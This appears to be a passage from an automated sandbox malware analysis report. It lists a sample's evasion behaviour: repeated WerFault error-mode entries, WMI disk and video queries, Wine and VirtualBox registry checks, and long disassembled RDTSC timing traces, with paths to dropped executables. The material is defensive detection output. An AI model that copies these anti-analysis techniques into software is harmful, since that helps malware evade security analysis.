Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found API chain indicative of sandbox detection
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\1000015002\b74664dd7e.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\1000015002\b74664dd7e.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0F1D5 second address: E0F1D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0F1D9 second address: E0F1FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6230h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jo 00007F4B90BE6226h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0F1FB second address: E0EACF instructions: 0x00000000 rdtsc 0x00000002 je 00007F4B9132D698h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jmp 00007F4B9132D69Bh 0x00000012 push dword ptr [ebp+122D0D41h] 0x00000018 jns 00007F4B9132D6A1h 0x0000001e jmp 00007F4B9132D69Bh 0x00000023 call dword ptr [ebp+122D2E7Eh] 0x00000029 pushad 0x0000002a mov dword ptr [ebp+122D346Ah], ebx 0x00000030 xor eax, eax 0x00000032 jo 00007F4B9132D69Ch 0x00000038 pushad 0x00000039 mov ecx, edi 0x0000003b mov ecx, edi 0x0000003d popad 0x0000003e mov edx, dword ptr [esp+28h] 0x00000042 sub dword ptr [ebp+122D346Ah], ebx 0x00000048 mov dword ptr [ebp+122D2998h], eax 0x0000004e sub dword ptr [ebp+122D346Ah], edx 0x00000054 mov esi, 0000003Ch 0x00000059 cld 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e mov dword ptr [ebp+122D183Ch], edi 0x00000064 lodsw 0x00000066 jmp 00007F4B9132D69Eh 0x0000006b add eax, dword ptr [esp+24h] 0x0000006f jne 00007F4B9132D6A7h 0x00000075 mov ebx, dword ptr [esp+24h] 0x00000079 cld 0x0000007a nop 0x0000007b jmp 00007F4B9132D6A7h 0x00000080 push eax 0x00000081 jbe 00007F4B9132D6A0h 0x00000087 pushad 0x00000088 push ebx 0x00000089 pop ebx 0x0000008a push eax 0x0000008b push edx 0x0000008c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F91548 second address: F9154C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8C1A8 second address: F8C1E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4B9132D6A0h 0x0000000b pushad 0x0000000c jnl 00007F4B9132D696h 0x00000012 jmp 00007F4B9132D6A9h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9071D second address: F90721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F90721 second address: F90727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F90DF8 second address: F90DFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F948A9 second address: F948AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F948AD second address: E0EACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F4B90BE623Fh 0x0000000c popad 0x0000000d add dword ptr [esp], 3EAE31B3h 0x00000014 push dword ptr [ebp+122D0D41h] 0x0000001a call dword ptr [ebp+122D2E7Eh] 0x00000020 pushad 0x00000021 mov dword ptr [ebp+122D346Ah], ebx 0x00000027 xor eax, eax 0x00000029 jo 00007F4B90BE622Ch 0x0000002f pushad 0x00000030 mov ecx, edi 0x00000032 mov ecx, edi 0x00000034 popad 0x00000035 mov edx, dword ptr [esp+28h] 0x00000039 sub dword ptr [ebp+122D346Ah], ebx 0x0000003f mov dword ptr [ebp+122D2998h], eax 0x00000045 sub dword ptr [ebp+122D346Ah], edx 0x0000004b mov esi, 0000003Ch 0x00000050 cld 0x00000051 add esi, dword ptr [esp+24h] 0x00000055 mov dword ptr [ebp+122D183Ch], edi 0x0000005b lodsw 0x0000005d jmp 00007F4B90BE622Eh 0x00000062 add eax, dword ptr [esp+24h] 0x00000066 jne 00007F4B90BE6237h 0x0000006c mov ebx, dword ptr [esp+24h] 0x00000070 cld 0x00000071 nop 0x00000072 jmp 00007F4B90BE6237h 0x00000077 push eax 0x00000078 jbe 00007F4B90BE6230h 0x0000007e pushad 0x0000007f push ebx 0x00000080 pop ebx 0x00000081 push eax 0x00000082 push edx 0x00000083 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F94998 second address: F9499D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F94A1E second address: F94A23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F94B15 second address: F94B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4B9132D6A7h 0x0000000a popad 0x0000000b add dword ptr [esp], 2A7FDFF4h 0x00000012 mov dword ptr [ebp+122D3310h], edx 0x00000018 lea ebx, dword ptr [ebp+124597D6h] 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007F4B9132D698h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 mov edx, esi 0x0000003a xchg eax, ebx 0x0000003b jmp 00007F4B9132D69Eh 0x00000040 push eax 0x00000041 pushad 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F94B79 second address: F94B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B90BE6232h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F4B90BE622Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F94C0A second address: F94C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F94C0E second address: F94C19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F94C19 second address: F94CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jnl 00007F4B9132D696h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 popad 0x00000012 nop 0x00000013 js 00007F4B9132D699h 0x00000019 movsx ecx, dx 0x0000001c push 00000000h 0x0000001e or ecx, dword ptr [ebp+122D297Ch] 0x00000024 push 6978462Dh 0x00000029 pushad 0x0000002a jne 00007F4B9132D698h 0x00000030 push ebx 0x00000031 pop ebx 0x00000032 push ecx 0x00000033 jmp 00007F4B9132D6A4h 0x00000038 pop ecx 0x00000039 popad 0x0000003a xor dword ptr [esp], 697846ADh 0x00000041 clc 0x00000042 push 00000003h 0x00000044 jg 00007F4B9132D69Ch 0x0000004a push 00000000h 0x0000004c push 00000000h 0x0000004e push esi 0x0000004f call 00007F4B9132D698h 0x00000054 pop esi 0x00000055 mov dword ptr [esp+04h], esi 0x00000059 add dword ptr [esp+04h], 00000014h 0x00000061 inc esi 0x00000062 push esi 0x00000063 ret 0x00000064 pop esi 0x00000065 ret 0x00000066 jmp 00007F4B9132D6A2h 0x0000006b push 00000003h 0x0000006d ja 00007F4B9132D697h 0x00000073 push C416B966h 0x00000078 push eax 0x00000079 push edx 0x0000007a jmp 00007F4B9132D69Eh 0x0000007f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F94CC6 second address: F94D29 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4B90BE6237h 0x00000008 jmp 00007F4B90BE6231h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xor dword ptr [esp], 0416B966h 0x00000016 jmp 00007F4B90BE622Bh 0x0000001b lea ebx, dword ptr [ebp+124597E1h] 0x00000021 push 00000000h 0x00000023 push edi 0x00000024 call 00007F4B90BE6228h 0x00000029 pop edi 0x0000002a mov dword ptr [esp+04h], edi 0x0000002e add dword ptr [esp+04h], 00000019h 0x00000036 inc edi 0x00000037 push edi 0x00000038 ret 0x00000039 pop edi 0x0000003a ret 0x0000003b jnl 00007F4B90BE622Ah 0x00000041 xchg eax, ebx 0x00000042 pushad 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F76429 second address: F7643A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Ch 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB1FB5 second address: FB1FC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE622Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB1FC5 second address: FB1FD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jne 00007F4B9132D696h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB2250 second address: FB2271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 jmp 00007F4B90BE622Eh 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 je 00007F4B90BE6226h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB25BD second address: FB25C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB25C7 second address: FB25CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB25CB second address: FB25CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB2729 second address: FB272D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB272D second address: FB273D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F4B9132D696h 0x0000000a je 00007F4B9132D696h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB273D second address: FB274C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007F4B90BE6226h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB274C second address: FB2783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F4B9132D696h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F4B9132D69Bh 0x00000015 jng 00007F4B9132D69Eh 0x0000001b push eax 0x0000001c push edx 0x0000001d jbe 00007F4B9132D696h 0x00000023 jns 00007F4B9132D696h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB28CA second address: FB28D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB28D0 second address: FB2901 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 jo 00007F4B9132D69Ah 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jbe 00007F4B9132D6B9h 0x00000018 jmp 00007F4B9132D69Fh 0x0000001d push eax 0x0000001e push edx 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 jns 00007F4B9132D696h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB2901 second address: FB2905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB2D4E second address: FB2D58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F4B9132D696h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB2D58 second address: FB2D5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB2ED5 second address: FB2EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB2EE0 second address: FB2EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB2EE6 second address: FB2EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB2EEA second address: FB2EEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB2EEE second address: FB2EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB2EF4 second address: FB2F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F4B90BE6236h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FAB3B9 second address: FAB3BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FAB3BD second address: FAB3C7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4B90BE6226h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FAB3C7 second address: FAB3CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FAB3CD second address: FAB3D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB389E second address: FB38DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4B9132D6A5h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F4B9132D69Dh 0x00000012 jmp 00007F4B9132D6A5h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB3D7B second address: FB3D81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB3D81 second address: FB3D8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
